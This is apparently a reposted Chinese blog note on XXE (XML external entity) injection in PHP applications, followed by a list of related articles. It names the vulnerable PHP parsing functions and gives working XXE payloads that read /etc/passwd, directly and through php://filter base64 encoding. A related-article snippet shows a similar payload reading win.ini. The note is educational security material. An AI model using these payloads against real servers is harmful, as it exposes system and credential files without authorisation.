xxe漏洞分析

最新推荐文章于 2022-03-22 10:23:40 发布
最新推荐文章于 2022-03-22 10:23:40 发布
阅读量198 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/wangshuwin/p/7502559.html
版权

xxe漏洞总结

  • xxe漏洞就是xml外部实体注入攻击,所以一定是针对xml编写的服务。
  • xxe漏洞是把参数经过php输入流或者$HTTP_RAW_POST_DATA直接读入xml实体当中,参数可控且没有进行过滤。容易导致xxe的是下面几个函数/类
    DOMDocument::loadXML,SimpleXMLElement,simplexml_load_string
    构造的语句主要是
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

还会用到php://filter这种流(php://filter是一个特殊的协议流,作为中间流来处理其他流)

 <?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

还有很多利用和绕过方法可以,依具体情况看。在ctf里面注意文件的读取有可能会用上php://filter。
这篇文章讲一些xml和xxe的知识比较全

转载于:https://www.cnblogs.com/wangshuwin/p/7502559.html

aihuochou9723
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebGoat8-xxe注入漏洞分析
09-15
WebGoat8-xxe注入漏洞分析
[连载]java代码审计中常见漏洞的特征函数-xxe
重新启程
10-15 446
本期要点 当一个比较完善的经过其他审计专家进行过代码审计的软件,希望直接能够找到单一的可以直接利用的漏洞,确实有点接近天方夜谭。 各种代码审计专家,他们不会进行动态调试,基本上都静态的根据各种审计软件或者设计手册进行审计。 这里就必然会出现一种可能性,静态审计无法对动态结果进行猜测 多个小的不起眼的问题,单个是无法利用的,并且改动对于软件的整体结构有很大影响,那么开发团队就会倾向于不修改。 所以我们一定不要孤立的去看任何一个小的漏洞或者不正确的写法 甚至于,
XXE详解
qq_48904485的博客
03-22 5286
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
xxe漏洞详解
scu_hacker博客
12-17 3653
本文详细描述了xxe漏洞的原理、利用方式、防御方法
XXE漏洞详解
weixin_56714714的博客
07-25 7707
XXE 什么是XXE? ​ XXE全程xml外部实体,从安全角度来讲,由此引发的漏洞称之为XML外部实体攻击 XML作为一种使用较为广泛的数据传输格式,很多应用程序都包含有处理xml数据的代码, 许多过时或配置不当的XML处理器都会对外部实体进行引用,如果攻击者可以上传XML文档或者在XML文档 中添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器,XXE漏洞的出现和开发语言无关 只要是应用程序中对XML数据做了解析,而且这些数据又受用户控制,那么应用程序都可能受到XXE攻击 什么是XML?
IXMLDOMDocument中的load方法返回值有BUG
03-20 3906
IXMLDOMDocument中的load方法返回值是否有BUGIXMLDOMDocument中load一个xml文件时,返回值和msdn上说的不符MSDN上说的是:Return ValuesS_OK The value returned if successful.S_FALSE The value returned if the load fails.E_INVALID
基于XXE漏洞的网络安全分析与利用工具开发
最新发布
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞XXE漏洞发生在应用程序解析XML输入时,...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入)漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
XXE漏洞笔记
公众号shadow sock7
06-30 2934
参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/detail/3841.html http://blog.csdn.net/u011721501/article/details/43775691 http://thief.one/2017/06/20/1
渗透之路基础 -- XXE注入漏洞
09-17 406
XXE漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 类似于...
XXE漏洞攻防原理
m0_38103658的博客
11-05 764
XXE漏洞攻防原理 方便永远是安全的敌人 你的知识面,决定你的攻击面 0x01 简述 XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 而...
XXE漏洞学习及利用
qq_38352420的博客
06-30 412
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.
XXE漏洞(2)漏洞实战
jelly
07-07 1851
本次测试XXE主要在靶机上安装了bWAPP程序,中间有一关为XXE漏洞很好做测试了解XXE漏洞。 靶机:192.168.56.101 攻击机kali:192.168.56.1 目录 了解XXE漏洞原理 漏洞成因 怎么判断网站是否存在XXE漏洞 基本利用 XML漏洞利用 任意文件读取 有回显的xxe利用 读取特殊符号文件 没有回显读取文档的方式 内网探测 DDOS攻击 XXE漏洞防御 了解XXE漏洞原理 漏洞成因 XXE漏洞全称XML External Entity ...
[渗透测试笔记] 11.xxe漏洞分析
H4ppyD0g的博客
02-13 203
XXE漏洞全称XML External Entity Injection, 即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 小白感觉这个东西说白了就是文件包含吧,以允许外部实体载入为前提,引入包含恶意构造的内容的文件而造成攻击效果的漏洞吧。 攻击...
XXE漏洞原理分析
YvesHe的专栏
10-16 2383
一.什么是XXE漏洞? 在web攻防中有很多的漏洞,这里就来介绍一种基于XML数据格式的漏洞. 那么大家经常说的XXE漏洞到底是个什么漏洞呢? XML 外部实体漏洞 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]> <foo>&a
【搬运于原博客】XXE漏洞学习及利用
qq_38352420的博客
06-30 192
title: date: 2018-08-10 10:43:51 XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径.
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值